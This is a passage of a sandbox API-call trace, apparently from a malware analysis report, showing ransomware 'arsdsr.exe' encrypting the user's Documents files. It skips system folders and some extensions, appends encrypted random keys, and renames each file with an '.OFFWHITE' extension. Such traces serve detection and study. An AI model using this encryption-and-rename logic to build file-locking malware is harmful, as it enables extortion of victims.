nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f838*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.258] GetProcessHeap () returned 0x500000 [0134.258] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe5c4) returned 0x55a7b8 [0134.258] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.258] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xe5c4, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xe5c4, lpOverlapped=0x0) returned 1 [0134.263] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.263] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xe5c4, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xe5c4, lpOverlapped=0x0) returned 1 [0134.263] GetProcessHeap () returned 0x500000 [0134.263] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.263] CloseHandle (hObject=0xb0) returned 1 [0134.276] GetProcessHeap () returned 0x500000 [0134.276] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.276] GetProcessHeap () returned 0x500000 [0134.276] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.276] GetProcessHeap () returned 0x500000 [0134.276] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.276] GetProcessHeap () returned 0x500000 [0134.276] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.276] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt" [0134.276] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt.OFFWHITE" [0134.277] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\paoe_noddzybnr41.odt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\paoe_noddzybnr41.odt.offwhite")) returned 1 [0134.278] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51fe6890, ftCreationTime.dwHighDateTime=0x1d55e36, ftLastAccessTime.dwLowDateTime=0xc1e99580, ftLastAccessTime.dwHighDateTime=0x1d5cd7b, ftLastWriteTime.dwLowDateTime=0xc1e99580, ftLastWriteTime.dwHighDateTime=0x1d5cd7b, nFileSizeHigh=0x0, nFileSizeLow=0xa352, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="PhI0irjG7.pptx", cAlternateFileName="PHI0IR~1.PPT")) returned 1 [0134.278] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2=".") returned 1 [0134.278] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="..") returned 1 [0134.278] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="...") returned 1 [0134.278] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="windows") returned -1 [0134.278] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="$recycle.bin") returned 1 [0134.279] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="rsa") returned -1 [0134.279] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="ntuser.dat") returned 1 [0134.279] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="programdata") returned -1 [0134.279] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="appdata") returned 1 [0134.279] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="program files") returned -1 [0134.279] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="program files (x86)") returned -1 [0134.279] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.279] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="PhI0irjG7.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx" [0134.279] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.279] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.279] PathFindExtensionW (pszPath="PhI0irjG7.pptx") returned=".pptx" [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0134.279] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0134.280] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0134.280] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0134.280] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0134.280] lstrcmpiW (lpString1="PhI0irjG7.pptx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.280] GetProcessHeap () returned 0x500000 [0134.280] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f848 [0134.280] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\phi0irjg7.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.280] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=41810) returned 1 [0134.280] GetProcessHeap () returned 0x500000 [0134.280] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.281] GetProcessHeap () returned 0x500000 [0134.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.281] GetProcessHeap () returned 0x500000 [0134.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.281] GetProcessHeap () returned 0x500000 [0134.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.281] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.281] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.281] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.281] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.281] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.282] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.282] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xa352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.282] SetLastError (dwErrCode=0x0) [0134.282] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.288] GetLastError () returned 0x0 [0134.288] GetLastError () returned 0x0 [0134.289] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xa452, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.289] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.289] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xa552, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.289] WriteFile (in: hFile=0xb0, lpBuffer=0x53f848*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f848*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.289] GetProcessHeap () returned 0x500000 [0134.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xa352) returned 0x55a7b8 [0134.289] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.289] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xa352, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xa352, lpOverlapped=0x0) returned 1 [0134.294] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.294] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xa352, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xa352, lpOverlapped=0x0) returned 1 [0134.294] GetProcessHeap () returned 0x500000 [0134.294] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.294] CloseHandle (hObject=0xb0) returned 1 [0134.296] GetProcessHeap () returned 0x500000 [0134.297] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.297] GetProcessHeap () returned 0x500000 [0134.297] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.297] GetProcessHeap () returned 0x500000 [0134.297] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.297] GetProcessHeap () returned 0x500000 [0134.297] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.297] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx" [0134.297] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx.OFFWHITE" [0134.297] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\phi0irjg7.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PhI0irjG7.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\phi0irjg7.pptx.offwhite")) returned 1 [0134.298] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b2e8610, ftCreationTime.dwHighDateTime=0x1d59b16, ftLastAccessTime.dwLowDateTime=0x3cc1d070, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x3cc1d070, ftLastWriteTime.dwHighDateTime=0x1d5bf3e, nFileSizeHigh=0x0, nFileSizeLow=0xb5cc, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="VL3gDMu5soDiZ1.pptx", cAlternateFileName="VL3GDM~1.PPT")) returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2=".") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="..") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="...") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="windows") returned -1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="$recycle.bin") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="rsa") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="ntuser.dat") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="programdata") returned 1 [0134.298] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="appdata") returned 1 [0134.299] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="program files") returned 1 [0134.299] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="program files (x86)") returned 1 [0134.299] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.299] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="VL3gDMu5soDiZ1.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx" [0134.299] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.299] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.299] PathFindExtensionW (pszPath="VL3gDMu5soDiZ1.pptx") returned=".pptx" [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0134.299] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0134.300] lstrcmpiW (lpString1="VL3gDMu5soDiZ1.pptx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.300] GetProcessHeap () returned 0x500000 [0134.300] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f858 [0134.300] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vl3gdmu5sodiz1.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.300] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=46540) returned 1 [0134.300] GetProcessHeap () returned 0x500000 [0134.300] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.300] GetProcessHeap () returned 0x500000 [0134.300] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.301] GetProcessHeap () returned 0x500000 [0134.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.301] GetProcessHeap () returned 0x500000 [0134.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.301] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.301] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.301] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.301] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.302] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb5cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.302] SetLastError (dwErrCode=0x0) [0134.302] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb6cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.304] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.304] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb7cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.304] WriteFile (in: hFile=0xb0, lpBuffer=0x53f858*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f858*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.304] GetProcessHeap () returned 0x500000 [0134.304] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb5cc) returned 0x55a7b8 [0134.304] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.305] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xb5cc, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xb5cc, lpOverlapped=0x0) returned 1 [0134.307] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.307] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xb5cc, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xb5cc, lpOverlapped=0x0) returned 1 [0134.308] GetProcessHeap () returned 0x500000 [0134.308] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.308] CloseHandle (hObject=0xb0) returned 1 [0134.309] GetProcessHeap () returned 0x500000 [0134.309] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.309] GetProcessHeap () returned 0x500000 [0134.309] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.309] GetProcessHeap () returned 0x500000 [0134.309] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.309] GetProcessHeap () returned 0x500000 [0134.309] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.309] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx" [0134.310] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx.OFFWHITE" [0134.310] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vl3gdmu5sodiz1.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VL3gDMu5soDiZ1.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vl3gdmu5sodiz1.pptx.offwhite")) returned 1 [0134.310] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a46c4a0, ftCreationTime.dwHighDateTime=0x1d5df79, ftLastAccessTime.dwLowDateTime=0x9ed32280, ftLastAccessTime.dwHighDateTime=0x1d5e6af, ftLastWriteTime.dwLowDateTime=0x9ed32280, ftLastWriteTime.dwHighDateTime=0x1d5e6af, nFileSizeHigh=0x0, nFileSizeLow=0xcd3e, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="x3OIQRAcNV5 6d.pptx", cAlternateFileName="X3OIQR~1.PPT")) returned 1 [0134.310] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2=".") returned 1 [0134.310] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="..") returned 1 [0134.310] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="...") returned 1 [0134.310] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="windows") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="$recycle.bin") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="rsa") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="ntuser.dat") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="programdata") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="appdata") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="program files") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="program files (x86)") returned 1 [0134.311] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.311] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="x3OIQRAcNV5 6d.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx" [0134.311] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.311] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 